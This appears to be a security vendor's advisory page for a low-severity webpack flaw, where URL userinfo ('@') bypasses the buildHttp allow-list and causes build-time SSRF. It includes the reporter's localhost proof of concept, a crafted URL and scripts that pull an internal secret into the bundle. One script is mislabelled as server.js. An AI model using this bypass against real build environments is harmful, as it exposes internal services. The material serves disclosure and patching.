How severe is GHSA-8fgc-7cc6-rx7x?

GHSA-8fgc-7cc6-rx7x has a CVSS score of 3.7/10, rated LOW. Review your exposure and patch according to your risk tolerance.

Which packages are affected by GHSA-8fgc-7cc6-rx7x?

GHSA-8fgc-7cc6-rx7x affects the following packages: webpack (npm). Ecosystems affected: npm.

How do I fix GHSA-8fgc-7cc6-rx7x?

Update webpack to 5.104.1 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-8fgc-7cc6-rx7x is resolved across your whole dependency graph.

How do I detect GHSA-8fgc-7cc6-rx7x in my npm dependencies?

Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for webpack. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

How do I mitigate GHSA-8fgc-7cc6-rx7x if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

How does O3 Security protect against GHSA-8fgc-7cc6-rx7x?

O3 pinpoints whether GHSA-8fgc-7cc6-rx7x is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-8fgc-7cc6-rx7x actively exploited in the wild?

No public exploit code has been indexed for GHSA-8fgc-7cc6-rx7x yet. This does not mean the vulnerability cannot be exploited — absence of public exploits does not imply safety. Apply the recommended fix and use O3 Security to monitor your exposure.

What is the EPSS score for GHSA-8fgc-7cc6-rx7x?

GHSA-8fgc-7cc6-rx7x has an EPSS (Exploit Prediction Scoring System) score of 0.2%, placing it in the 10th percentile of all CVEs. EPSS is maintained by FIRST.org and estimates the probability that a vulnerability will be exploited in the wild within the next 30 days. This score indicates relatively lower exploitation probability, though the CVSS severity should still guide your patching priority.

What type of vulnerability is GHSA-8fgc-7cc6-rx7x?

GHSA-8fgc-7cc6-rx7x is classified as Server-Side Request Forgery (SSRF) (CWE-918). This weakness type describe the underlying flaw category, which helps determine the potential impact and the right class of mitigation. This is a high-impact weakness class that often enables remote code execution or data exposure.

When was GHSA-8fgc-7cc6-rx7x published, and has it been updated?

GHSA-8fgc-7cc6-rx7x was published on February 5, 2026 and was last updated on February 14, 2026. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

📦 npm

GHSA-8fgc-7cc6-rx7x

LOW

webpack buildHttp: allowedUris allow-list bypass via URL userinfo (@) leading to build-time SSRF behavior

Also known asCVE-2025-68458

Published

Feb 5, 2026

Updated

Feb 14, 2026

Affected

1 pkg

Patched

1 / 1

Exploits

None indexed

EPSS Exploitation Probability

via FIRST.org ↗

0.2%probability of exploitation in next 30 days

Lower Risk10th percentile+0.19%

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected

Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.

webpacknpm

51.4Mdownloads / week

Description

Summary

When experiments.buildHttp is enabled, webpack’s HTTP(S) resolver (HttpUriPlugin) can be bypassed to fetch resources from hosts outside allowedUris by using crafted URLs that include userinfo (username:password@host). If allowedUris enforcement relies on a raw string prefix check (e.g., uri.startsWith(allowed)), a URL that looks allow-listed can pass validation while the actual network request is sent to a different authority/host after URL parsing. This is a policy/allow-list bypass that enables build-time SSRF behavior (outbound requests from the build machine to internal-only endpoints, depending on network access) and untrusted content inclusion (the fetched response is treated as module source and bundled). In my reproduction, the internal response was also persisted in the buildHttp cache.

Reproduced on:

webpack version: 5.104.0
Node version: v18.19.1

Details

Root cause (high level): allowedUris validation can be performed on the raw URI string, while the actual request destination is determined later by parsing the URL (e.g., new URL(uri)), which interprets the authority as the part after @.

Example crafted URL:

http://127.0.0.1:[email protected]:9100/secret.js

If the allow-list is ["http://127.0.0.1:9000"], then:

Raw string check:
crafted.startsWith("http://127.0.0.1:9000") → true
URL parsing (WHAT new URL() will contact):
origin → http://127.0.0.1:9100 (host/port after @)

As a result, webpack fetches http://127.0.0.1:9100/secret.js even though allowedUris only included http://127.0.0.1:9000.

Evidence from reproduction:

Server logs showed the internal-only endpoint being fetched:
- [internal] 200 /secret.js served (...) (observed multiple times)
Attacker-side build output showed:
- the internal secret marker was present in the bundle
- the internal secret marker was present in the buildHttp cache

PoC

This PoC is intentionally constrained to 127.0.0.1 (localhost-only “internal service”) to demonstrate SSRF behavior safely.

1) Setup

mkdir split-userinfo-poc && cd split-userinfo-poc
npm init -y
npm i -D webpack webpack-cli

2) Create server.js

#!/usr/bin/env node
"use strict";

const http = require("http");

const ALLOWED_PORT = 9000;   // allowlisted-looking host
const INTERNAL_PORT = 9100;  // actual target if bypass succeeds

const secret = `INTERNAL_ONLY_SECRET_${Math.random().toString(16).slice(2)}`;
const internalPayload =
  `// internal-only\n` +
  `export const secret = ${JSON.stringify(secret)};\n` +
  `export default "ok";\n`;

function listen(port, handler) {
  return new Promise(resolve => {
    const s = http.createServer(handler);
    s.listen(port, "127.0.0.1", () => resolve(s));
  });
}

(async () => {
  // "Allowed" host (should NOT be contacted if bypass works as intended)
  await listen(ALLOWED_PORT, (req, res) => {
    console.log(`[allowed-host] ${req.method} ${req.url} (should NOT be hit in userinfo bypass)`);
    res.statusCode = 200;
    res.setHeader("Content-Type", "application/javascript; charset=utf-8");
    res.end(`export default "ALLOWED_HOST_WAS_HIT_UNEXPECTEDLY";\n`);
  });

  // Internal-only service (SSRF-like target)
  await listen(INTERNAL_PORT, (req, res) => {
    if (req.url === "/secret.js") {
      console.log(`[internal] 200 /secret.js served (secret=${secret})`);
      res.statusCode = 200;
      res.setHeader("Content-Type", "application/javascript; charset=utf-8");
      res.end(internalPayload);
      return;
    }
    console.log(`[internal] 404 ${req.method} ${req.url}`);
    res.statusCode = 404;
    res.end("not found");
  });

  console.log("\nServers up:");
  console.log(`- allowed-host (should NOT be contacted): http://127.0.0.1:${ALLOWED_PORT}/`);
  console.log(`- internal target (should be contacted if vulnerable): http://127.0.0.1:${INTERNAL_PORT}/secret.js`);
})();

2) Create server.js

#!/usr/bin/env node
"use strict";

const path = require("path");
const os = require("os");
const fs = require("fs/promises");
const webpack = require("webpack");

function fmtBool(b) { return b ? "✅" : "❌"; }

async function walk(dir) {
  const out = [];
  let items;
  try { items = await fs.readdir(dir, { withFileTypes: true }); }
  catch { return out; }
  for (const it of items) {
    const p = path.join(dir, it.name);
    if (it.isDirectory()) out.push(...await walk(p));
    else if (it.isFile()) out.push(p);
  }
  return out;
}

async function fileContains(f, needle) {
  try {
    const buf = await fs.readFile(f);
    const s1 = buf.toString("utf8");
    if (s1.includes(needle)) return true;
    const s2 = buf.toString("latin1");
    return s2.includes(needle);
  } catch {
    return false;
  }
}

(async () => {
  const webpackVersion = require("webpack/package.json").version;

  const ALLOWED_PORT = 9000;
  const INTERNAL_PORT = 9100;

  // NOTE: allowlist is intentionally specified without a trailing slash
  // to demonstrate the risk of raw string prefix checks.
  const allowedUri = `http://127.0.0.1:${ALLOWED_PORT}`;

  // Crafted URL using userinfo so that:
  // - The string begins with allowedUri
  // - The actual authority (host:port) after '@' is INTERNAL_PORT
  const crafted = `http://127.0.0.1:${ALLOWED_PORT}@127.0.0.1:${INTERNAL_PORT}/secret.js`;
  const parsed = new URL(crafted);

  const tmp = await fs.mkdtemp(path.join(os.tmpdir(), "webpack-httpuri-userinfo-poc-"));
  const srcDir = path.join(tmp, "src");
  const distDir = path.join(tmp, "dist");
  const cacheDir = path.join(tmp, ".buildHttp-cache");
  const lockfile = path.join(tmp, "webpack.lock");
  const bundlePath = path.join(distDir, "bundle.js");

  await fs.mkdir(srcDir, { recursive: true });
  await fs.mkdir(distDir, { recursive: true });

  await fs.writeFile(
    path.join(srcDir, "index.js"),
    `import { secret } from ${JSON.stringify(crafted)};
console.log("LEAKED_SECRET:", secret);
export default secret;
`
  );

  const config = {
    context: tmp,
    mode: "development",
    entry: "./src/index.js",
    output: { path: distDir, filename: "bundle.js" },
    experiments: {
      buildHttp: {
        allowedUris: [allowedUri],
        cacheLocation: cacheDir,
        lockfileLocation: lockfile,
        upgrade: true
      }
    }
  };

  console.log("\n[ENV]");
  console.log(`- webpack version: ${webpackVersion}`);
  console.log(`- node version:    ${process.version}`);
  console.log(`- allowedUris:     ${JSON.stringify([allowedUri])}`);

  console.log("\n[CRAFTED URL]");
  console.log(`- import specifier: ${crafted}`);
  console.log(`- WHAT startsWith() sees: begins with "${allowedUri}" => ${fmtBool(crafted.startsWith(allowedUri))}`);
  console.log(`- WHAT URL() parses:`);
  console.log(`  - username: ${JSON.stringify(parsed.username)} (userinfo)`);
  console.log(`  - password: ${JSON.stringify(parsed.password)} (userinfo)`);
  console.log(`  - hostname: ${parsed.hostname}`);
  console.log(`  - port:     ${parsed.port}`);
  console.log(`  - origin:   ${parsed.origin}`);
  console.log(`  - NOTE: request goes to origin above (host/port after @), not to "${allowedUri}"`);

  const compiler = webpack(config);

  compiler.run(async (err, stats) => {
    try {
      if (err) throw err;
      const info = stats.toJson({ all: false, errors: true, warnings: true });

      if (stats.hasErrors()) {
        console.error("\n[WEBPACK ERRORS]");
        console.error(info.errors);
        process.exitCode = 1;
        return;
      }

      const bundle = await fs.readFile(bundlePath, "utf8");
      const m = bundle.match(/INTERNAL_ONLY_SECRET_[0-9a-f]+/i);
      const foundSecret = m ? m[0] : null;

      console.log("\n[RESULT]");
      console.log(`- temp dir:  ${tmp}`);
      console.log(`- bundle:    ${bundlePath}`);
      console.log(`- lockfile:  ${lockfile}`);
      console.log(`- cacheDir:  ${cacheDir}`);

      console.log("\n[SECURITY CHECK]");
      console.log(`- bundle contains INTERNAL_ONLY_SECRET_* : ${fmtBool(!!foundSecret)}`);

      if (foundSecret) {
        const lockHit = await fileContains(lockfile, foundSecret);

        const cacheFiles = await walk(cacheDir);
        let cacheHit = false;
        for (const f of cacheFiles) {
          if (await fileContains(f, foundSecret)) { cacheHit = true; break; }
        }

        console.log(`- lockfile contains secret: ${fmtBool(lockHit)}`);
        console.log(`- cache contains secret:    ${fmtBool(cacheHit)}`);
      }
    } catch (e) {
      console.error(e);
      process.exitCode = 1;
    } finally {
      compiler.close(() => {});
    }
  });
})();

4) Run

Terminal A:

node server.js

Terminal B:

node attacker.js

5) Expected vs Actual

Expected: The import should be blocked because the effective request destination is http://127.0.0.1:9100/secret.js, which is outside allowedUris (only http://127.0.0.1:9000 is allow-listed).

Actual: The crafted URL passes the allow-list prefix validation, webpack fetches the internal-only resource on port 9100 (confirmed by server logs), and the secret marker appears in the bundle and buildHttp cache.

Impact

Vulnerability class: Policy/allow-list bypass leading to build-time SSRF behavior and untrusted content inclusion in build outputs.

Who is impacted: Projects that enable experiments.buildHttp and rely on allowedUris as a security boundary. If an attacker can influence the imported HTTP(S) specifier (e.g., via source contribution, dependency manipulation, or configuration), they can cause outbound requests from the build environment to endpoints outside the allow-list (including internal-only services, subject to network reachability). The fetched response can be treated as module source and included in build outputs and persisted in the buildHttp cache, increasing the risk of leakage or supply-chain contamination.

Affected Packages

1 total 1 fixed

Ecosystem	Package	Vulnerable range	Fix
📦npm	`webpack`	≥ 5.49.0&&< 5.104.1	5.104.1

Detection & mitigation playbook

Open-source dependency

Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for webpack. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update webpack to 5.104.1 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-8fgc-7cc6-rx7x is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-8fgc-7cc6-rx7x is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-8fgc-7cc6-rx7x. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Summary When `experiments.buildHttp` is enabled, webpack’s HTTP(S) resolver (`HttpUriPlugin`) can be bypassed to fetch resources from **hosts outside `allowedUris`** by using crafted URLs that include **userinfo** (`username:password@host`). If `allowedUris` enforcement relies on a **raw string prefix check** (e.g., `uri.startsWith(allowed)`), a URL that *looks* allow-listed can pass validation while the actual network request is sent to a different authority/host after URL parsing. This is a **policy/allow-list bypass** that enables **build-time SSRF behavior** (outbound requests from the

O3 Security · Impact-Aware SCA

Is GHSA-8fgc-7cc6-rx7x in your dependencies?

O3 detects GHSA-8fgc-7cc6-rx7x across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works

GHSA-8fgc-7cc6-rx7x

EPSS Exploitation Probability

Blast Radius

Description

Summary

Details

PoC

1) Setup

2) Create server.js

2) Create server.js

4) Run

5) Expected vs Actual

Impact

Affected Packages

Detection & mitigation playbook

Detect

Fix

Workarounds

How O3 protects you

Frequently Asked Questions

Is GHSA-8fgc-7cc6-rx7x in your dependencies?